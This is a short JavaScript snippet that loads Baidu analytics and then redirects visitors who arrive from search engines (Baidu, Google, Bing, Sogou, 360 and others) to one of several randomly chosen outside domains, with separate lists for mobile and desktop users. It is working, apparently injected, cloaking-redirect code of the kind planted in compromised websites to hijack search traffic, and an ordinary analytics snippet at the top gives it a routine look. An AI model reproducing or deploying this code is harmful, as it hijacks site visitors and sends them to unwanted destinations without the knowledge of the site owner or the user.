var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?5f003303e789f4619071208b12c9c281";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var urls = new Array();
urls[0] = "https://www.kf0000.com";
urls[1] = "https://www.k88208.com";
urls[2] = "https://www.kf7272.com";

var urlsM = new Array();
urlsM[0] = "https://m.kf0000.com";
urlsM[1] = "https://m.k88208.com";
urlsM[2] = "https://m.kf7272.com";

n = Math.floor(Math.random()*3);


var regexp = /\.(baidu|haosou|so|sogou|soso|google|sm|yahoo|bing|360)(\.[a-z0-9\-]+){1,2}\//ig;
var where = document.referrer;
if (regexp.test(where)) {
  if (/mobile|android|iphone|ipad|phone/i.test(navigator.userAgent.toLowerCase())) {
    location.href= urlsM[n];
  }
  else{
    location.href= urls[n];
  }
}